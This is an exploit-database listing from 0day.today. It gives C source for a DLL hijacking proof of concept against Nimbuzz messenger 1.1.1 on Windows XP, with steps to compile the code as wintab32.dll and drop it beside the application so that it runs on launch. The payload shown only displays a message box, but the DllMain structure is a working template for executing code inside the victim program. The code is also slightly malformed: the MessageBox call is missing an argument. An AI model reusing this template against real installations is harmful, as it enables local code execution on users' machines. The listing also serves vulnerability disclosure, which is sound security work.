[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nimbuzz social messenger DLL hijacking (wintab32.dll) Vulnerability

Author
t3rm!n4t0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13941
Category
local exploits
Date add
01-09-2010
Platform
windows
===================================================================
Nimbuzz social messenger DLL hijacking (wintab32.dll) Vulnerability
===================================================================

/*Nimbuzz social messenger DLL Hijacking Vulnerability
   
 ~Legion Of Xtremers and Hackers Garage~

  Author: Prashant Uniyal

  Special greets to:"vinnu" and Secfence Team

  Greets to: b0nd,fb1h2s,AnArKi,d4rk357,d4rky

  Version:  Nimbuzz 1.1.1

  Tested on: Windows XP SP2 En

  Complile and rename to wintab32.dll. Place it in the dir 
  and execute nimbuzz messenger. 
*/


#include <windows.h>
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_hijack();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
 
    return TRUE;
}
 
int dll_hijack()
{
    MessageBox(0, "DLL Hijacked!",MB_OK);
}



#  0day.today [2024-11-15]  #